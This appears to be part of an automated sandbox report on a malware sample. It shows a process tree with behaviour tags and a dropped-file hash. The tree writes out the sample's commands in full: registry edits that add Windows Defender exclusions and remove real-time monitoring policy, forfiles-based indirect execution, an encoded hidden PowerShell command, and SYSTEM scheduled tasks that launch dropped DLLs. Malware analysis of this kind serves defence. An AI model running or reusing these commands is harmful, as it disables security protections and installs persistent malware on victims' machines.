                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              PID:2284
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1068
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                              • Windows security bypass
                                                              • System Location Discovery: System Language Discovery
                                                              PID:448
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MPFNXoKXzyqBDJwgtRR" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2376
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MPFNXoKXzyqBDJwgtRR" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2100
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNFoOxfNKqcU2" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:884
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNFoOxfNKqcU2" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:2172
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VEimOQGFjqRbC" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1504
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VEimOQGFjqRbC" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2244
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cZbJtpIpASUn" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1580
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cZbJtpIpASUn" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2084
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cbXLGCfkU" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:2416
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cbXLGCfkU" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1492
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XmGOnMMGQtrDCnVB" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:3028
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\XmGOnMMGQtrDCnVB" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3056
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2472
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2364
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2988
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\RoPfBoimVzGRLRwMm" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:1608
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:32
                                                                            4⤵
                                                                              PID:2928
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\eARlaXjMdtDvPsxl" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                                PID:2596
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /CREATE /TN "geabsrCLQ" /SC once /ST 00:57:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                              3⤵
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:1956
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /run /I /tn "geabsrCLQ"
                                                                              3⤵
                                                                                PID:676
                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                schtasks /DELETE /F /TN "geabsrCLQ"
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1964
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                3⤵
                                                                                  PID:1516
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                    4⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1732
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:2468
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                    4⤵
                                                                                      PID:2952
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "npMHyhjSDWfSapeUE" /SC once /ST 04:27:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\eARlaXjMdtDvPsxl\DERhaUccLiymJlo\xlzxTyW.exe\" c6 /xtlodidBZ 525403 /S" /V1 /F
                                                                                    3⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:1244
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "npMHyhjSDWfSapeUE"
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2480
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 260
                                                                                    3⤵
                                                                                    • Loads dropped DLL
                                                                                    • Program crash
                                                                                    PID:2788
                                                                                • C:\Windows\Temp\eARlaXjMdtDvPsxl\DERhaUccLiymJlo\xlzxTyW.exe
                                                                                  C:\Windows\Temp\eARlaXjMdtDvPsxl\DERhaUccLiymJlo\xlzxTyW.exe c6 /xtlodidBZ 525403 /S
                                                                                  2⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Drops Chrome extension
                                                                                  • Drops file in System32 directory
                                                                                  • Drops file in Program Files directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2796
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2540
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                      4⤵
                                                                                      • Indirect Command Execution
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:2324
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:1884
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                            6⤵
                                                                                              PID:2044
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:2688
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:636
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                              6⤵
                                                                                                PID:2692
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                            4⤵
                                                                                            • Indirect Command Execution
                                                                                            PID:1284
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                                PID:2340
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                  6⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2184
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                              4⤵
                                                                                              • Indirect Command Execution
                                                                                              PID:948
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                5⤵
                                                                                                  PID:1464
                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    6⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1136
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                4⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:1280
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                  5⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:2816
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    6⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Drops file in System32 directory
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1264
                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      7⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:944
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "byQqbWVboeSiQfgDlP"
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:1860
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                              3⤵
                                                                                                PID:2372
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:612
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2196
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1456
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2292
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3052
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                    5⤵
                                                                                                      PID:2360
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                        6⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1020
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          7⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3056
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\cbXLGCfkU\uyCOzs.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eAnaBWTIeDttJoc" /V1 /F
                                                                                                  3⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:1712
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "eAnaBWTIeDttJoc2" /F /xml "C:\Program Files (x86)\cbXLGCfkU\napTaTD.xml" /RU "SYSTEM"
                                                                                                  3⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:696
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /END /TN "eAnaBWTIeDttJoc"
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1452
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "eAnaBWTIeDttJoc"
                                                                                                  3⤵
                                                                                                    PID:664
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "DdmUvLpRVdhvrH" /F /xml "C:\Program Files (x86)\NNFoOxfNKqcU2\YfdUdWE.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1268
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "OcpyrGcUAJRzU2" /F /xml "C:\ProgramData\XmGOnMMGQtrDCnVB\LLdsTDC.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2760
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "BUdkbwqMlfMiDpSzz2" /F /xml "C:\Program Files (x86)\MPFNXoKXzyqBDJwgtRR\nRYeKdm.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:2680
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "pfSvMoBuYQoSbUMPenP2" /F /xml "C:\Program Files (x86)\VEimOQGFjqRbC\IHOMuZD.xml" /RU "SYSTEM"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1576
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /CREATE /TN "frOumnqlMrwgmgfdr" /SC once /ST 04:27:53 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\eARlaXjMdtDvPsxl\ikFRrGJk\fAhEKsR.dll\",#1 /VIdidju 525403" /V1 /F
                                                                                                    3⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                    PID:1952
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /run /I /tn "frOumnqlMrwgmgfdr"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1596
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "npMHyhjSDWfSapeUE"
                                                                                                    3⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:1432
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 1560
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Program crash
                                                                                                    PID:3044
                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\eARlaXjMdtDvPsxl\ikFRrGJk\fAhEKsR.dll",#1 /VIdidju 525403
                                                                                                  2⤵
                                                                                                    PID:2156
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\eARlaXjMdtDvPsxl\ikFRrGJk\fAhEKsR.dll",#1 /VIdidju 525403
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:888
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "frOumnqlMrwgmgfdr"
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1424
                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                  taskeng.exe {82D3930C-D136-4D44-999A-918DC34B775F} S-1-5-21-3434294380-2554721341-1919518612-1000:ELZYPTFV\Admin:Interactive:[1]
                                                                                                  1⤵
                                                                                                    PID:2112
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1972
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:2100
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:3048
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:3044
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2576
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:2924
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:1452
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:976
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:1868

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Program Files (x86)\MPFNXoKXzyqBDJwgtRR\nRYeKdm.xml

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                                MD5

                                                                                                                ec85fce25cd62a517fbbf2f1ad0536a8

